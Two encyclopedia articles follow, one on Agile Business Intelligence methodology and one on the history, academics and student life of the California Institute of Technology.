Agile Business Intelligence (BI) refers to the use of Agile software development for BI projects to reduce the time it takes for traditional BI to show value to the organization, and to help in quickly adapting to changing business needs. Agile BI enables the BI team and managers to make better business decisions, and to start doing this more quickly.
Agile BI
Agile Business Intelligence (BI) refers to the use of the agile software development methodology for BI projects to reduce the time-to-value of traditional BI and helps in quickly adapting to changing business needs. Agile BI enables the BI team and managers to make better business decisions. Agile methodology works on the iterative principle; this provides the new features of software to the end users sooner than the traditional waterfall process which delivers only the final product. With Agile the requirements and design phases overlap with development, thus reducing the development cycles for faster delivery. It promotes adaptive planning, evolutionary development and delivery, a time-boxed iterative approach, and encourages rapid and flexible response to change. Agile BI encourages business users and IT professionals to think about their data differently and it characterized by low Total Cost of Change (TCC). With agile BI, the focus is not on solving every BI problem at once but rather on delivering pieces of BI functionality in manageable chunks via shorter development cycles and documenting each cycle as it happens. Many companies fail to deliver right information to the right business managers at the right time.
Definition
Agile BI is a continual process and not a onetime implementation. Managers and leaders need accurate and quick information about the company and business intelligence provides the data they need. Agile BI enables rapid development using the agile methodology. Agile techniques are a great way to promote development of BI applications, such as dashboards, scorecards, reports and analytic applications.
"Forrester Research defines agile BI as an approach that combines processes, methodologies, tools and technologies, while incorporating organizational structure, in order to help strategic, tactical and operational decision-makers be more flexible and more responsive to ever-changing business and regulatory requirements". According to the research by the Aberdeen Group, organizations with the most highly agile BI implementations are more likely to have processes in place for ensuring that business needs are being met. Success of Agile BI implementation also heavily depends on the end user participation and "frequent collaboration between IT and the business".
Key Performance Criteria
Aberdeen's Maturity Class Framework uses three key performance criteria to distinguish the Best-in-class in the industry:
Availability of timely management information – IT should be able to provide the right and accurate information in timely manner to the business managers to make sound business decisions. “This performance metric captures the frequency with which business users receive their information they need in the timeframe they need it”.
Average time required to add a column to an existing report – Sometimes new columns need to be added to an existing report to see the required information. "If that information cannot be obtained within the time required to support the decision at hand, the information has no material value. This metric measure the total elapsed time required to modify an existing report by adding a column".
Average time required to create a new dashboard – This metric considers the time required to access any new or updated information and it measures the total elapsed time required to create a new dashboard.
The Agile SDLC
Agile SDLC Iterative Process
Five Steps To Agile BI
Bruni in her article 5 Steps To Agile BI outlines the five elements that promote an Agile BI enterprise environment.
Agile Development Methodology – “need for an agile, iterative process that speeds the time to market of BI requests by shortening development cycles”.
Agile Project Management Methodology – continuous planning and execution. Planning is done at the beginning of each cycle, rather than one time at the beginning of the project as in traditional projects. In Agile project, scope can be changed any time during the development phase.
Agile Infrastructure – the system should have virtualization and horizontal scaling capability. This gives flexibility to easily modify the infrastructure and could also maintain near-real-time BI more easily than the standard Extract, transform, load (ETL) model.
Cloud & Agile BI – Many organizations are implementing cloud technology now as it is the cheaper alternative to store and transfer data. Companies who are in their initial stages of implementing Agile BI should consider the Cloud technology as cloud services can now support BI and ETL software to be provisioned in the cloud.
IT Organization & Agile BI – To achieve agility and maximum effectiveness, the IT team should interact with the business, but also address the business problems and should have a strong and cohesive team.
Twelve Agile Principles
There are 12 Agile Principles (Manifesto) Agile Manifesto grouped as Process, People, and Other.
Process
1. Our highest priority is to satisfy the customer through early and continuous delivery of valuable software.
2. Welcome changing requirements, even late in development. Agile processes harness change for the customer's competitive advantage.
3. Deliver working software frequently, from a couple of weeks to a couple of months, with a preference to the shorter timescale.
4. Working software is the primary measure of progress.
People
5. Agile processes promote sustainable development. The sponsors, developers, and users should be able to maintain a constant pace indefinitely.
6. Business people and developers must work together daily throughout the project.
7. Build projects around motivated individuals. Give them the environment and support they need, and trust them to get the job done.
Other
8. The most efficient and effective method of conveying information is face-to-face conversation.
9. At regular intervals, the team reflects on how to become more effective, then tunes and adjusts its behavior.
10. Continuous attention to technical excellence and good design enhances agility.
11. Simplicity-the art of maximizing the amount of work not done-is essential.
12. The best architectures, requirements, and designs emerge from self-organizing teams.
BI model and its characteristic goals
Kernochan, in his two-year study of organization's BI process came up with the below model and its characteristic goals:
Data entry — accuracy
Data consolidation — consistency
Data aggregation — scope
Information targeting — fit
Information delivery — timeliness
Information analysis — analyzability
Common Issues
Kernochan's study found these common issues with the current BI processes:
20% of data has error in it (accuracy)
50% of data is inconsistent (consistency)
It typically takes 7 days to get data to the end user (timeliness)
It isn't possible to do a cross-database query on 70% of company data (scope)
65% of the time, executives don't receive the data they need (fit)
60% of the time, users can't do immediate online analysis of data they receive (analyzability)
75% of new key information sources that surface on the Web are not passed on to users within the year (agility)
The result concluded that the adding of agility to existing business intelligence will minimize problems.
Organizations are slowly trying to move the entire organization processes to agile methodology and development. Agile BI will play a big part in company's success as it "emphasizes integration with agile development and innovation".
Improving Business Intelligence Agility
There are couple of factors that influence the success of Business Intelligence Agility.
Data Entry
20% of data is inaccurate and about 50% is inconsistent and these numbers increases with new type of data. Processes need to be re-evaluated and corrected to minimize data entry errors.
Data Consolidation
Often companies have multiple data stores and data is scattered across multiple data stores. "Agility theory emphasizes auto-discovery of each new data source, and automated upgrade of metadata repositories to automatically accommodate the new information".
Data Aggregation
Is a process in which information from many data stores is pulled and displayed in a summary report. Online analytical processing (OLAP) is a simple type of data aggregation tools which is commonly used.
Information Delivery
One of the key principal of Agile BI is to deliver the right data at the right time to the right individual. Historical data should also be maintained for comparing the current performance with the past.
Information Analysis
One of the largest benefits of Agile BI is in improving the decision-making of its users. Real Agile BI should focus on analysis tools that make an operational process or new product development better. The Agile BI approach will save company money, time, and resources that would otherwise be needed to build a traditional data warehouse using the Waterfall methodology.
Agile BI Checklist
A team of developers and business representatives should be assembled to work together
Select either a business stakeholder or technical liaisons to represent the business
Identify and prioritize appropriate user stories or requirements to address during an initial project
Assess various Agile BI delivery tools that can integrate with your existing data warehouse and BI environment
Initiate iterative development process
Advantages of using Agile BI
Agile BI drives its users to self-serve BI. It offers organizations flexibility in terms of delivery, user adoption, and ROI.
Faster to Deliver
Using Agile methodology, the product is delivered in shorter development cycles with multiple iterations. Each iteration is a working software and can be deployed to production.
Increased User Acceptance
In an Agile development environment, IT and business work together (often in the same room) refining the business needs in each iteration. "This increases user adoption by focusing on the frequently changing needs of the non-technical business user, leading to high end-user engagement, and resulting in higher user adoption rates".
Increased ROI
Organizations can achieve increased rate-of-return (ROI) due to shorter development cycles. This minimizes the IT resources and time while delivering working, relevant reports to end-users.
Agile BI Best Practices
A program charter should be created, which will set the stakeholder expectations on how Agile BI system will work.
Start with the business information needs to provide context for scope.
Iterations should be time-boxed.
Stress on data discovery through the requirements and design phase.
Use the Agile process of incremental and iterative development and deployment.
Validate the BI Architecture and get approval on the proof of concept.
Data validation and verification should be completed for each development iteration.
Use flow charts or diagram to explain the BI process along with some documentation.
Any change that will be deployed to production should be thoroughly tested in regression environment.
Have a formal change control; this will minimize the risk as all changes have to be approved before it goes into production.
References
Business intelligence
|
5786
|
https://en.wikipedia.org/wiki/California%20Institute%20of%20Technology
|
California Institute of Technology
|
The California Institute of Technology (Caltech) is a private research university in Pasadena, California, United States of America. The university is known for its strength in science and engineering, and is among a small group of institutes of technology in the United States which is primarily devoted to the instruction of pure and applied sciences. Caltech is ranked among the best academic institutions in the world and is among the most selective in the U.S.
Caltech was founded as a preparatory and vocational school by Amos G. Throop in 1891 and began attracting influential scientists such as George Ellery Hale, Arthur Amos Noyes, and Robert Andrews Millikan in the early 20th century. The vocational and preparatory schools were disbanded and spun off in 1910 and the college assumed its present name in 1920. In 1934, Caltech was elected to the Association of American Universities, and the antecedents of NASA's Jet Propulsion Laboratory, which Caltech continues to manage and operate, were established between 1936 and 1943 under Theodore von Kármán.
Caltech has six academic divisions with strong emphasis on science and engineering, managing $332 million in 2011 in sponsored research. Its primary campus is located approximately northeast of downtown Los Angeles. First-year students are required to live on campus, and 95% of undergraduates remain in the on-campus House System at Caltech. Although Caltech has a strong tradition of practical jokes and pranks, student life is governed by an honor code which allows faculty to assign take-home examinations. The Caltech Beavers compete in 13 intercollegiate sports in the NCAA Division III's Southern California Intercollegiate Athletic Conference (SCIAC).
, there are 76 Nobel laureates who have been affiliated with Caltech, including 40 alumni and faculty members (41 prizes, with chemist Linus Pauling being the only individual in history to win two unshared prizes); in addition, 4 Fields Medalists and 6 Turing Award winners have been affiliated with Caltech. There are 8 Crafoord Laureates and 56 non-emeritus faculty members (as well as many emeritus faculty members) who have been elected to one of the United States National Academies, 4 Chief Scientists of the U.S. Air Force and 71 have won the United States National Medal of Science or Technology. Numerous faculty members are associated with the Howard Hughes Medical Institute as well as NASA. According to a 2015 Pomona College study, Caltech ranked number one in the U.S. for the percentage of its graduates who go on to earn a PhD.
History
Throop College
Caltech started as a vocational school founded in present-day Old Pasadena on Fair Oaks Avenue and Chestnut Street on September 23, 1891, by local businessman and politician Amos G. Throop. The school was known successively as Throop University, Throop Polytechnic Institute (and Manual Training School) and Throop College of Technology before acquiring its current name in 1920. The vocational school was disbanded and the preparatory program was split off to form the independent Polytechnic School in 1907.
At a time when scientific research in the United States was still in its infancy, George Ellery Hale, a solar astronomer from the University of Chicago, founded the Mount Wilson Observatory in 1904. He joined Throop's board of trustees in 1907, and soon began developing it and the whole of Pasadena into a major scientific and cultural destination. He engineered the appointment of James A. B. Scherer, a literary scholar untutored in science but a capable administrator and fund-raiser, to Throop's presidency in 1908. Scherer persuaded retired businessman and trustee Charles W. Gates to donate $25,000 in seed money to build Gates Laboratory, the first science building on campus.
World Wars
In 1910, Throop moved to its current site. Arthur Fleming donated the land for the permanent campus site. Theodore Roosevelt delivered an address at Throop Institute on March 21, 1911, and he declared:
I want to see institutions like Throop turn out perhaps ninety-nine of every hundred students as men who are to do given pieces of industrial work better than any one else can do them; I want to see those men do the kind of work that is now being done on the Panama Canal and on the great irrigation projects in the interior of this country—and the one-hundredth man I want to see with the kind of cultural scientific training that will make him and his fellows the matrix out of which you can occasionally develop a man like your great astronomer, George Ellery Hale.
In the same year, a bill was introduced in the California Legislature calling for the establishment of a publicly funded "California Institute of Technology", with an initial budget of a million dollars, ten times the budget of Throop at the time. The board of trustees offered to turn Throop over to the state, but the presidents of Stanford University and the University of California successfully lobbied to defeat the bill, which allowed Throop to develop as the only scientific research-oriented education institute in southern California, public or private, until the onset of the World War II necessitated the broader development of research-based science education. The promise of Throop attracted physical chemist Arthur Amos Noyes from MIT to develop the institution and assist in establishing it as a center for science and technology.
With the onset of World War I, Hale organized the National Research Council to coordinate and support scientific work on military problems. While he supported the idea of federal appropriations for science, he took exception to a federal bill that would have funded engineering research at land-grant colleges, and instead sought to raise a $1 million national research fund entirely from private sources. To that end, as Hale wrote in The New York Times:
Throop College of Technology, in Pasadena California has recently afforded a striking illustration of one way in which the Research Council can secure co-operation and advance scientific investigation. This institution, with its able investigators and excellent research laboratories, could be of great service in any broad scheme of cooperation. President Scherer, hearing of the formation of the council, immediately offered to take part in its work, and with this object, he secured within three days an additional research endowment of one hundred thousand dollars.
Through the National Research Council, Hale simultaneously lobbied for science to play a larger role in national affairs, and for Throop to play a national role in science. The new funds were designated for physics research, and ultimately led to the establishment of the Norman Bridge Laboratory, which attracted experimental physicist Robert Andrews Millikan from the University of Chicago in 1917. During the course of the war, Hale, Noyes and Millikan worked together in Washington on the NRC. Subsequently, they continued their partnership in developing Caltech.
Under the leadership of Hale, Noyes, and Millikan (aided by the booming economy of Southern California), Caltech grew to national prominence in the 1920s and concentrated on the development of Roosevelt's "Hundredth Man". On November 29, 1921, the trustees declared it to be the express policy of the institute to pursue scientific research of the greatest importance and at the same time "to continue to conduct thorough courses in engineering and pure science, basing the work of these courses on exceptionally strong instruction in the fundamental sciences of mathematics, physics, and chemistry; broadening and enriching the curriculum by a liberal amount of instruction in such subjects as English, history, and economics; and vitalizing all the work of the Institute by the infusion in generous measure of the spirit of research". In 1923, Millikan was awarded the Nobel Prize in Physics. In 1925, the school established a department of geology and hired William Bennett Munro, then chairman of the division of History, Government, and Economics at Harvard University, to create a division of humanities and social sciences at Caltech. In 1928, a division of biology was established under the leadership of Thomas Hunt Morgan, the most distinguished biologist in the United States at the time, and discoverer of the role of genes and the chromosome in heredity. In 1930, Kerckhoff Marine Laboratory was established in Corona del Mar under the care of Professor George MacGinitie. In 1926, a graduate school of aeronautics was created, which eventually attracted Theodore von Kármán. Kármán later helped create the Jet Propulsion Laboratory, and played an integral part in establishing Caltech as one of the world's centers for rocket science. In 1928, construction of the Palomar Observatory began.
Millikan served as "Chairman of the Executive Council" (effectively Caltech's president) from 1921 to 1945, and his influence was such that the institute was occasionally referred to as "Millikan's School." Millikan initiated a visiting-scholars program soon after joining Caltech. Notable scientists who accepted his invitation include Paul Dirac, Erwin Schrödinger, Werner Heisenberg, Hendrik Lorentz and Niels Bohr. Albert Einstein arrived on the Caltech campus for the first time in 1931 to polish up his Theory of General Relativity, and he returned to Caltech subsequently as a visiting professor in 1932 and 1933.
During World War II, Caltech was one of 131 colleges and universities nationally that took part in the V-12 Navy College Training Program which offered students a path to a Navy commission. The United States Navy also maintained a naval training school for aeronautical engineering, resident inspectors of ordinance and naval material, and a liaison officer to the National Defense Research Committee on campus.
Project Vista
From April to December 1951, Caltech was the host of a federal classified study, Project Vista. The selection of Caltech as host for the project was based on the university's expertise in rocketry and nuclear physics. In response to the war in Korea and the pressure from the Soviet Union, the project was Caltech's way of assisting the federal government in its effort to increase national security. The project was created to study new ways of improving the relationship between tactical air support and ground troops. The Army, Air Force, and Navy sponsored the project; however, it was under contract with the Army. The study was named after the hotel, Vista del Arroyo Hotel, which housed the study. The study operated under a committee with the supervision of President Lee A. DuBridge. William A. Fowler, a professor at Caltech, was selected as research director. More than a fourth of Caltech's faculty and a group of outside scientists staffed the project. Moreover, the number increases if one takes into account visiting scientists, military liaisons, secretarial, and security staff. In compensation for its participation, the university received about $750,000.
Post-war growth
From the 1950s to 1980s, Caltech was the home of Murray Gell-Mann and Richard Feynman, whose work was central to the establishment of the Standard Model of particle physics. Feynman was also widely known outside the physics community as an exceptional teacher and a colorful, unconventional character.
During Lee A. DuBridge's tenure as Caltech's president (1946–1969), Caltech's faculty doubled and the campus tripled in size. DuBridge, unlike his predecessors, welcomed federal funding of science. New research fields flourished, including chemical biology, planetary science, nuclear astrophysics, and geochemistry. A 200-inch telescope was dedicated on nearby Palomar Mountain in 1948 and remained the world's most powerful optical telescope for over forty years.
Caltech opened its doors to female undergraduates during the presidency of Harold Brown in 1970, and they made up 14% of the entering class. The portion of female undergraduates has been increasing since then.
Protests by Caltech students are rare. The earliest was a 1968 protest outside the NBC Burbank studios, in response to rumors that NBC was to cancel Star Trek. In 1973, the students from Dabney House protested a presidential visit with a sign on the library bearing the simple phrase "Impeach Nixon". The following week, Ross McCollum, president of the National Oil Company, wrote an open letter to Dabney House stating that in light of their actions he had decided not to donate one million dollars to Caltech. The Dabney family, being Republicans, disowned Dabney House after hearing of the protest.
21st century
Since 2000, the Einstein Papers Project has been located at Caltech. The project was established in 1986 to assemble, preserve, translate, and publish papers selected from the literary estate of Albert Einstein and from other collections.
In fall 2008, the freshman class was 42% female, a record for Caltech's undergraduate enrollment. In the same year, the Institute concluded a six-year-long fund-raising campaign. The campaign raised more than $1.4 billion from about 16,000 donors. Nearly half of the funds went into the support of Caltech programs and projects.
In 2010, Caltech, in partnership with Lawrence Berkeley National Laboratory and headed by Professor Nathan Lewis, established a DOE Energy Innovation Hub aimed at developing revolutionary methods to generate fuels directly from sunlight. This hub, the Joint Center for Artificial Photosynthesis, will receive up to $122 million in federal funding over five years.
Since 2012, Caltech began to offer classes through massive open online courses (MOOCs) under Coursera, and from 2013, edX.
Jean-Lou Chameau, the eighth president, announced on February 19, 2013, that he would be stepping down to accept the presidency at King Abdullah University of Science and Technology. Thomas F. Rosenbaum was announced to be the ninth president of Caltech on October 24, 2013, and his term began on July 1, 2014.
In 2019, Caltech received a gift of $750 million for sustainability research from the Resnick family of The Wonderful Company. The gift is the largest ever for environmental sustainability research and the second-largest private donation to a US academic institution (after Bloomberg's gift of $1.8 billion to Johns Hopkins University in 2018).
On account of President Robert A. Millikan's affiliation with the Human Betterment Foundation, in January 2021, the Caltech Board of Trustees authorized the removal of Millikan's name (and the names of five other historical figures affiliated with the Foundation), from campus buildings.
Campus
Caltech's primary campus is located in Pasadena, California, approximately northeast of downtown Los Angeles. It is within walking distance of Old Town Pasadena and the Pasadena Playhouse District and therefore the two locations are frequent getaways for Caltech students.
In 1917 Hale hired architect Bertram Goodhue to produce a master plan for the campus. Goodhue conceived the overall layout of the campus and designed the physics building, Dabney Hall, and several other structures, in which he sought to be consistent with the local climate, the character of the school, and Hale's educational philosophy. Goodhue's designs for Caltech were also influenced by the traditional Spanish mission architecture of Southern California.
During the 1960s, Caltech underwent considerable expansion, in part due to the philanthropy of alumnus Arnold O. Beckman. In 1953, Beckman was asked to join the Caltech Board of Trustees. In 1964, he became its chairman. Over the next few years, as Caltech's president emeritus David Baltimore describes it, Arnold Beckman and his wife Mabel "shaped the destiny of Caltech".
In 1971 a magnitude-6.6 earthquake in San Fernando caused some damage to the Caltech campus. Engineers who evaluated the damage found that two historic buildings dating from the early days of the Institute—Throop Hall and the Goodhue-designed Culbertson Auditorium—had cracked.
New additions to the campus include the Cahill Center for Astronomy and Astrophysics and the Walter and Leonore Annenberg Center for Information Science and Technology, which opened in 2009, and the Warren and Katherine Schlinger Laboratory for Chemistry and Chemical Engineering followed in March 2010. The institute also concluded an upgrading of the South Houses in 2006. In late 2010, Caltech completed a 1.3 MW solar array projected to produce approximately 1.6 GWh in 2011.
Organization and administration
Caltech is incorporated as a non-profit corporation and is governed by a privately appointed 46-member board of trustees who serve five-year terms of office and retire at the age of 72. The trustees elect a president to serve as the chief executive officer of the institute and administer the affairs on the institute on behalf of the board, a provost who serves as the chief academic officer of the institute below the president, and ten other vice presidential and other senior positions. Thomas F. Rosenbaum became the ninth president of Caltech in 2014. Caltech's endowment is governed by a permanent trustee committee and administered by an investment office.
The institute is organized into six primary academic divisions: Biology and Biological Engineering, Chemistry and Chemical Engineering, Engineering and Applied Science, Geological and Planetary Sciences, Humanities and Social Sciences, Physics, Mathematics, and Astronomy. The voting faculty of Caltech include all professors, instructors, research associates and fellows, and the University Librarian. Faculty are responsible for establishing admission requirements, academic standards, and curricula. The Faculty Board is the faculty's representative body and consists of 18 elected faculty representatives as well as other senior administration officials. Full-time professors are expected to teach classes, conduct research, advise students, and perform administrative work such as serving on committees.
Founded in 1930s, the Jet Propulsion Laboratory (JPL) is a federally funded research and development center (FFRDC) owned by NASA and operated as a division of Caltech through a contract between NASA and Caltech. In 2008, JPL spent over $1.6 billion on research and development and employed over 5,000 project-related and support employees. The JPL Director also serves as a Caltech Vice President and is responsible to the President of the Institute for the management of the laboratory.
Academics
Caltech is a small four-year, highly residential research university with slightly more students in graduate programs than undergraduate. The institute has been accredited by the Western Association of Schools and Colleges since 1949. Caltech is on the quarter system: the fall term starts in late September and ends before Christmas, the second term starts after New Year's Day and ends in mid-March, and the third term starts in late March or early April and ends in early June.
Rankings
For 2020, U.S. News & World Report ranked Caltech as tied for 12th in the United States among national universities overall, 8th for most innovative, and 11th for best value. U.S. News & World Report also ranked the graduate programs in chemistry and earth sciences first among national universities.
Caltech was ranked 1st internationally between 2011 and 2016 by the Times Higher Education World University Rankings. Caltech was ranked as the best university in the world in two categories: Engineering & Technology and Physical Sciences. It was also found to have the highest faculty citation rate in the world.
Admissions
For the Class of 2023 (enrolled Fall 2019), Caltech received 8,367 applications and accepted 6.4% of applicants; 235 enrolled. The class included 44% women and 56% men. 32% were of underrepresented ancestry (which includes students who self-identify as American Indian/Alaska Native, Hispanic/Latino, Black/African American, and/or Native Hawaiian/Pacific Islander), and 6% were foreign students.
Admission to Caltech is extremely rigorous and required the highest test scores in the nation. The middle 50% range of SAT scores for enrolled freshmen for the class of 2023 were 740–780 for evidence-based reading and writing and 790–800 for math, and 1530–1570 total. The middle 50% range ACT Composite score was 35–36. The SAT Math Level 2 middle 50% range was 800–800. The middle 50% range for the SAT Physics Subject Test was 760–800; SAT Chemistry Subject Test was 760–800;
SAT Biology Subject Tests was 760–800. In June 2020, Caltech announced a test-blind policy where they would not require nor consider test scores for the next two years; in July 2021, the moratorium was extended by another year.
Tuition and financial aid
Undergraduate tuition for the 2021–2022 school year was $56,394 and total annual costs were estimated to be $79,947 excluding the Caltech Student Health Insurance Plan. In 2012–2013, Caltech awarded $17.1 million in need-based aid, $438k in non-need-based aid, and $2.51 million in self-help support to enrolled undergraduate students. The average financial aid package of all students eligible for aid was $38,756 and students graduated with an average debt of $15,090.
Undergraduate program
The full-time, four-year undergraduate program emphasizes instruction in the arts and sciences and has high graduate coexistence. Caltech offers 28 majors (called "options") and 12 minors across all six academic divisions. Caltech also offers interdisciplinary programs in Applied Physics, Biochemistry, Bioengineering, Computation and Neural Systems, Control and Dynamical Systems, Environmental Science and Engineering, Geobiology and Astrobiology, Geochemistry, and Planetary Astronomy. The most popular options are Chemical Engineering, Computer Science, Electrical Engineering, Mechanical Engineering and Physics.
Prior to the entering class of 2013, Caltech required students to take a core curriculum of five terms of mathematics, five terms of physics, two terms of chemistry, one term of biology, two terms of lab courses, one term of scientific communication, three terms of physical education, and 12 terms of humanities and social science. Since 2013, only three terms each of mathematics and physics have been required by the institute, with the remaining two terms each required by certain options.
A typical class is worth 9 academic units and given the extensive core curriculum requirements in addition to individual options' degree requirements, students need to take an average of 40.5 units per term (more than four classes) in order to graduate in four years. 36 units is the minimum full-time load, 48 units is considered a heavy load, and registrations above 51 units require an overload petition. Approximately 20 percent of students double-major. This is achievable since the humanities and social sciences majors have been designed to be done in conjunction with a science major. Although choosing two options in the same division is discouraged, it is still possible.
First-year students are enrolled in first-term classes based upon results of placement exams in math, physics, chemistry, and writing and take all classes in their first two terms on a Pass/Fail basis. There is little competition; collaboration on homework is encouraged and the honor system encourages take-home tests and flexible homework schedules. Caltech offers co-operative programs with other schools, such as the Pasadena Art Center College of Design and Occidental College.
According to a PayScale study, Caltech graduates earn a median early career salary of $83,400 and $143,100 mid-career, placing them in the top 5 among graduates of US colleges and universities. The average net return on investment over a period of 20 years is $887,000, the tenth-highest among US colleges.
Caltech offers Army and Air Force ROTC in cooperation with the University of Southern California.
Graduate program
The graduate instructional programs emphasize doctoral studies and are dominated by science, technology, engineering, and mathematics fields. The institute offers graduate degree programs for the Master of Science, Engineer's Degree, Doctor of Philosophy, BS/MS and MD/PhD, with the majority of students in the PhD program. The most popular options are Chemistry, Physics, Biology, Electrical Engineering and Chemical Engineering. Applicants for graduate studies are required to take the GRE. GRE Subject scores are either required or strongly recommended by several options. A joint program between Caltech and the Keck School of Medicine of the University of Southern California, and the UCLA David Geffen School of Medicine grants MD/PhD degrees. Students in this program do their preclinical and clinical work at USC or UCLA, and their PhD work with any member of the Caltech faculty, including the Biology, Chemistry, and Engineering and Applied Sciences Divisions. The MD degree would be from USC or UCLA and the PhD would be awarded from Caltech.
The research facilities at Caltech are available to graduate students, but there are opportunities for students to work in facilities of other universities, research centers as well as private industries. The graduate student to faculty ratio is 4:1.
Approximately 99 percent of doctoral students have full financial support. Financial support for graduate students comes in the form of fellowships, research assistantships, teaching assistantships or a combination of fellowship and assistantship support.
Graduate students are bound by the honor code, as are the undergraduates, and the Graduate Honor Council oversees any violations of the code.
Research
Caltech is classified among "R1: Doctoral Universities – Very High Research Activity". Caltech was elected to the Association of American Universities in 1934 and remains a research university with "very high" research activity, primarily in STEM fields. Caltech manages research expenditures of $270 million annually, 66th among all universities in the U.S. and 17th among private institutions without medical schools for 2008. The largest federal agencies contributing to research are NASA, National Science Foundation, Department of Health and Human Services, Department of Defense, and Department of Energy. Caltech received $144 million in federal funding for the physical sciences, $40.8 million for the life sciences, $33.5 million for engineering, $14.4 million for environmental sciences, $7.16 million for computer sciences, and $1.97 million for mathematical sciences in 2008.
The institute was awarded an all-time high funding of $357 million in 2009. Active funding from the National Science Foundation Directorate of Mathematical and Physical Science (MPS) for Caltech stands at $343 million , the highest for any educational institution in the nation, and higher than the total funds allocated to any state except California and New York.
In 2005, Caltech had dedicated to research: to physical sciences, to engineering, and to biological sciences.
In addition to managing JPL, Caltech also operates the Palomar Observatory in San Diego County, the Owens Valley Radio Observatory in Bishop, California, the Submillimeter Observatory and W. M. Keck Observatory at the Mauna Kea Observatory, the Laser Interferometer Gravitational-Wave Observatory at Livingston, Louisiana and Richland, Washington, and Kerckhoff Marine Laboratory in Corona del Mar, California. The Institute launched the Kavli Nanoscience Institute at Caltech in 2006, the Keck Institute for Space Studies in 2008, and is also the current home for the Einstein Papers Project. The Spitzer Science Center (SSC), part of the Infrared Processing and Analysis Center located on the Caltech campus, is the data analysis and community support center for NASA's Spitzer Space Telescope.
Caltech partnered with UCLA to establish a Joint Center for Translational Medicine (UCLA-Caltech JCTM), which conducts experimental research into clinical applications, including the diagnosis and treatment of diseases such as cancer.
Caltech operates several TCCON stations as part of an international collaborative effort of measuring greenhouse gases globally. One station is on campus.
Undergraduates at Caltech are also encouraged to participate in research. About 80% of the class of 2010 did research through the annual Summer Undergraduate Research Fellowships (SURF) program at least once during their stay, and many continued during the school year. Students write and submit SURF proposals for research projects in collaboration with professors, and about 70 percent of applicants are awarded SURFs. The program is open to both Caltech and non-Caltech undergraduate students. It serves as preparation for graduate school and helps to explain why Caltech has the highest percentage of alumni who go on to receive a PhD of all the major universities.
The licensing and transferring of technology to the commercial sector is managed by the Office of Technology Transfer (OTT). OTT protects and manages the intellectual property developed by faculty members, students, other researchers, and JPL technologists. Caltech receives more invention disclosures per faculty member than any other university in the nation. , 1891 patents were granted to Caltech researchers since 1969.
Student life
House system
During the early 20th century, a Caltech committee visited several universities and decided to transform the undergraduate housing system from fraternities to a house system. Four South Houses (or Hovses, as styled in the stone engravings) were built: Blacker House, Dabney House, Fleming House and Ricketts House. In the 1960s, three North Houses were built: Lloyd House, Page House, and Ruddock House, and during the 1990s, Avery House. The four South Houses closed for renovation in 2005 and reopened in 2006. The latest addition to residential life at Caltech is Bechtel Residence, which opened in 2018. It is not affiliated with the house system. All first- and second-year students live on campus in the house system or in the Bechtel Residence.
On account of Albert B. Ruddock's affiliation with the Human Betterment Foundation, in January 2021, the Caltech Board of Trustees authorized the removal of Ruddock's name from campus buildings. Ruddock House was renamed as the Grant D. Venerable House.
Athletics
Caltech has athletic teams in baseball, men's and women's basketball, cross country, men's and women's soccer, swimming and diving, men's and women's tennis, track and field, women's volleyball, and men's and women's water polo. Caltech's mascot is the Beaver, a homage to nature's engineer. Its teams are members of the NCAA Division III and compete in the Southern California Intercollegiate Athletic Conference (SCIAC), which Caltech co-founded in 1915.
On January 6, 2007, the Beavers' men's basketball team snapped a 207-game losing streak to Division III schools, beating Bard College 81–52. It was their first Division III victory since 1996.
Until their win over Occidental College on February 22, 2011 the team had not won a game in SCIAC play since 1985. Ryan Elmquist's free throw with 3.3 seconds in regulation gave the Beavers the victory. The documentary film Quantum Hoops concerns the events of the Beavers' 2005–06 season.
On January 13, 2007, the Caltech women's basketball team snapped a 50-game losing streak, defeating the Pomona-Pitzer Sagehens 55–53. The women's program, which entered the SCIAC in 2002, garnered their first conference win. On the bench as honorary coach for the evening was Dr. Robert Grubbs, 2005 Nobel laureate in Chemistry. The team went on to beat Whittier College on February 10, for its second SCIAC win, and placed its first member on the All Conference team. The 2006–2007 season is the most successful season in the history of the program.
In 2007, 2008, and 2009, the women's table tennis team (a club team) competed in nationals. The women's Ultimate club team, known as "Snatch", has also been very successful in recent years, ranking 44 of over 200 college teams in the Ultimate Player's Association.
On February 2, 2013, the Caltech baseball team ended a 228-game losing streak, the team's first win in nearly 10 years.
The track and field team's home venue is at the South Athletic Field in Tournament Park, the site of the first Rose Bowl Game.
The school also sponsored a football team prior to 1976, which played part of its home schedule at the Rose Bowl, or, as Caltech students put it, "to the largest number of empty seats in the nation".
Performing and visual arts
The Caltech/Occidental College Orchestra is a full seventy-piece orchestra composed of students, faculty, and staff at Caltech and nearby Occidental College. The orchestra gives three pairs of concerts annually, at both Caltech and Occidental College. There are also two Caltech Jazz Bands and a Concert Band, as well as an active chamber music program. For vocal music, Caltech has a mixed-voice Glee Club and the smaller Chamber Singers. The theater program at Caltech is known as TACIT, or Theater Arts at the California Institute of Technology. There are two to three plays organized by TACIT per year, and they were involved in the production of the PHD Movie, released in 2011.
Student life traditions
Annual events
Every Halloween, Dabney House conducts the infamous "Millikan pumpkin-drop experiment" from the top of Millikan Library, the highest point on campus. According to tradition, a claim was once made that the shattering of a pumpkin frozen in liquid nitrogen and dropped from a sufficient height would produce a triboluminescent spark. This yearly event involves a crowd of observers, who try to spot the elusive spark. The title of the event is an oblique reference to the famous Millikan oil-drop experiment which measured e, the elemental unit of electrical charge.
On Ditch Day, the seniors ditch school, leaving behind elaborately designed tasks and traps at the doors of their rooms to prevent underclassmen from entering. Over the years this has evolved to the point where many seniors spend months designing mechanical, electrical, and software obstacles to confound the underclassmen. Each group of seniors designs a "stack" to be solved by a handful of underclassmen. The faculty have been drawn into the event as well, and cancel all classes on Ditch Day so the underclassmen can participate in what has become a highlight of the academic year.
Another long-standing tradition is the playing of Wagner's "Ride of the Valkyries" at 7:00 each morning during finals week with the largest, loudest speakers available. The playing of that piece is not allowed at any other time (except if one happens to be listening to the entire 14 hours and 5 minutes of The Ring Cycle), and any offender is dragged into the showers to be drenched in cold water fully dressed.
Pranks
Caltech students have been known for their many pranks (also known as "RFs").
The two most famous in recent history are the changing of the Hollywood Sign to read "Caltech", by judiciously covering up certain parts of the letters, and the changing of the scoreboard to read Caltech 38, MIT 9 during the 1984 Rose Bowl Game. But the most famous of all occurred during the 1961 Rose Bowl Game, where Caltech students altered the flip-cards that were raised by the stadium attendees to display "Caltech", and several other "unintended" messages. This event is now referred to as the Great Rose Bowl Hoax.
